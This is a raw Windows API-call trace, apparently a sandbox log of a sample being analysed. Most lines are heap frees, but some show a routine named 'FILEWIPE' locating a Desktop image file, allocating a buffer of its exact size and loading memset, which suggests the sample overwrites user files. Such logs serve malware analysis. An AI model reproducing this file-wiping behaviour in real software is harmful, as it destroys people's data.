hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0165.543] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0165.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.544] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0165.544] CloseHandle (hObject=0x138) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.546] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0165.546] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0165.547] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0165.548] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0165.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0165.550] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0165.550] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0165.550] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0165.550] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\q4egakohibj.png")) returned 0x20 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 0x90ae18 [0165.553] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0165.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0165.553] CharLowerBuffW (in: lpsz="byte[32779]", cchLength=0xb | out: lpsz="byte[32779]") returned 0xb [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0165.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0165.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.554] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.555] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0165.555] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.555] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0165.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0165.556] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0165.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.557] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0165.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0165.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2898, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.557] GetProcAddress (hModule=0x75c90000, lpProcName="memset") returned 0x75c99790 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0165.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0165.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0165.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0165.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: 